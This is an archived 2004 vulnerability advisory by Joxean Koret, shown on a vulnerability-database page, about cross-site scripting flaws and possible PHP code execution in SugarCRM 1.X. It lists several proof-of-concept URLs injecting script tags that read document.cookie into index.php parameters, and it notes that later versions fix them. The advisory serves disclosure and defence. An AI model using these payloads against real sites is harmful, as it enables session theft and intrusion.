Lucene search
K

sugarCRM.txt

🗓️ 02 Jan 2005 00:00:00Reported by Joxean KoretType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Cross Site Scripting vulnerabilities in SugarCRM 1.X could allow code execution in PHP.

Code
`----------------------------------------------------------------------------  
Cross Site Scripting Vulnerabilities and Possible Code Execution in  
SugarCRM  
----------------------------------------------------------------------------  
  
Author: Jose Antonio Coret (Joxean Koret)  
Date: 2004   
Location: Basque Country  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of  
a   
state-of-the-art user interface. Built on PHP and MySQL  
  
Web : http://sugarcrm.sourceforge.net  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~  
  
A. Cross Site Scripting Vulnerability  
  
A1. In the main script (index.php) various parameters, that are used to  
write the  
html code, not are verified.   
  
At least the following URLs are vulnerables to XSS (Cross Site  
Scripting) attacks :   
  
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index  
  
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>  
  
http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%  
3Ealert%28document.cookie%29%3C%2Fscript%  
3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search  
  
And the following are XSS vulnerables and, may be, arbitrary PHP remote  
code execution   
vulnerables as well :   
  
http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d  
  
http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script>  
  
  
The fix:  
~~~~~~~~  
  
All problems are fixed in the latests versions availables at the  
sugarcrm site.  
Go to http://sugarcrm.sourceforge.net site for more info about the new  
versions.  
  
Disclaimer:  
~~~~~~~~~~~  
  
The information in this advisory and any of its demonstrations is  
provided  
"as is" without any warranty of any kind.  
  
I am not liable for any direct or indirect damages caused as a result of  
using the information or demonstrations provided in any part of this  
advisory.   
  
---------------------------------------------------------------------------  
  
Contact:  
~~~~~~~~  
  
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
34